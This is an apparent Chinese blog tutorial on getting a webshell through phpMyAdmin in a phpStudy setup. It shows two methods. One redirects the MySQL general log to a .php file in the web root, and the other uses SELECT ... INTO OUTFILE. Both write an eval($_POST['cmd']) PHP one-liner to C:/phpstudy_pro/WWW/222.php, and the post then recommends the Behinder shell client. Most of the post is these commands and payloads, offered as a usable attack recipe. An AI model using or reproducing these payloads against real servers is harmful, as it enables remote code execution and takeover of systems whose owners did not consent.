常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
我命由我123454 小时前
执行 Gradle 指令报错,无法将“grep”项识别为 cmdlet、函数、脚本文件或可运行程序的名称
android·java·java-ee·android studio·android jetpack·android-studio·android runtime
狂奔solar5 小时前
ARMA 模型:从白噪声到万能逼近器
android
渣渣灰飞5 小时前
MySQL 系统学习 第五阶段:企业级 MySQL 实战开发 第二章:RBAC 权限系统设计
android·学习·mysql
qq_422828626 小时前
android 图形学之图层数据送显及合成图层(七)
android
MiyamuraMiyako7 小时前
Compose:从自动滚动到双锚点 LazyLayout
android·android jetpack
用户63421419935079 小时前
base_logger_core --- 跨平台 C++ 日志核心库
android
苦瓜花9 小时前
【Kotlin】初入门
android·开发语言·kotlin
dora9 小时前
使用 Cling 实现 DLNA 投屏:从局域网发现到媒体播放控制
android·android things·tvos
apihz10 小时前
全球域名 WHOIS 信息实时查询免费 API 接口教程,支持1000+后缀
android·网络·网络协议·tcp/ip·apache·域名·whois
非典型Android程序员12 小时前
Binder机制学习总结
android